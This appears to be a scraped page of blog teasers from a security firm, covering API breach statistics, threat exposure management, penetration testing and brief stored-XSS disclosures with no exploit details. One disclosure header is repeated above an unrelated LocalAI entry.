In the rapidly changing field of software development, application programming interfaces (APIs) are very powerful tools. They allow different applications to communicate, share data, and collaborate seamlessly, constituting approximately 71% of all web traffic. However, as APIs become more essential to our applications, they also attract cyber threats. In fact, 57% of organizations reported experiencing at least one API-related data breach in the past two years.

Every single day, billions of API calls happen across the internet. Behind your favorite applications, APIs work quietly to move data and connect systems. But with the growing use of APIs, API attacks didn’t just increase – they exploded. Take the Optus breach in September 2022, in which attackers exploited an unprotected API endpoint and accessed the personal data of up to 9.8 million customers, leading to a $10 million fine.

Coined by Gartner in 2022, continuous threat exposure management, or CTEM is a structured framework for continuously assessing, prioritizing, validating, and remediating vulnerabilities across an organization’s attack surface, enabling you to respond effectively to the most pressing threats over an ever-expanding attack surface. Reactive security is a temporary fix, not a sustainable solution.

Product Name: Dynamic Dashboard Vulnerability: Stored XSS Vulnerable Version: >= 3.0.0, < 3.0.1 CVE: CVE-2024-47817 On October 5, 2024, the security researchers from Astra discovered a severe Stored Cross-Site Scripting vulnerability in Dynamic Dashboard’s paragraph widget. The widget, used for text and markdown, has inadequate input sanitization allowing attackers to inject malicious code.

Product Name: Dynamic Dashboard Vulnerability: Stored XSS Vulnerable Version: >= 3.0.0, < 3.0.1 CVE: CVE-2024-47817 Astra Security researchers identified a vulnerability in LocalAI, an Open-Source OpenAI alternative. The vulnerability, CVE-2024-9900, is a stored Cross-Site Scripting issue affecting the LocalAI v2.21.1 prompts, which allow malicious scripts and payloads to be input.

As organizations grow and adopt cloud-native technologies, securing digital infrastructure at scale has become increasingly complex. According to the Cloud Security Alliance, 73% of organizations struggle to secure business-critical cloud applications due to misconfigurations and limited risk visibility. Ransomware alone can cost companies millions, and with the rise in cyber threats, even cyber insurance may not fully protect them from repeated attacks.

Product Name: bodi0’s Easy Cache Vulnerability: Stored XSS Vulnerable Version: Will be disclosed soon CVE: Will be disclosed soon On September 16, 2024, the team of pentesters at Astra Security found a stored Cross-Site Scripting or XSS in bodi0’s Easy Cache plugin. It is a plugin designed for WordPress that helps optimize the caching functionality, thus allowing enhanced page loading and reducing the server load.

This Cyber Security Awareness month, we’re thrilled to launch The 403 Circle, our new community-driven approach to building a safer world. It isn’t for everyone, but it might be for you. We are surrounded by an overwhelming trove of information, from AI chatbots and mile-long whitepapers to social networks or ‘communities’ that treat you like a product—to acquire, upsell, and renew contracts. At Astra, we strive to simplify proactive security.

A penetration test or a pentest is a simulated cyber attack on a computer system by ethical hackers to discover and exploit vulnerabilities, mimicking real-world attackers to assess an organization’s security posture across web apps, networks, apps, and APIs.

Vulnerability scanning is the process of evaluating web and mobile applications, APIs consumed by them, or systems, networks, and cloud infrastructures to identify vulnerabilities. It involves using automated tools trained to scan for known CVEs, misconfigurations, and potential attack vectors.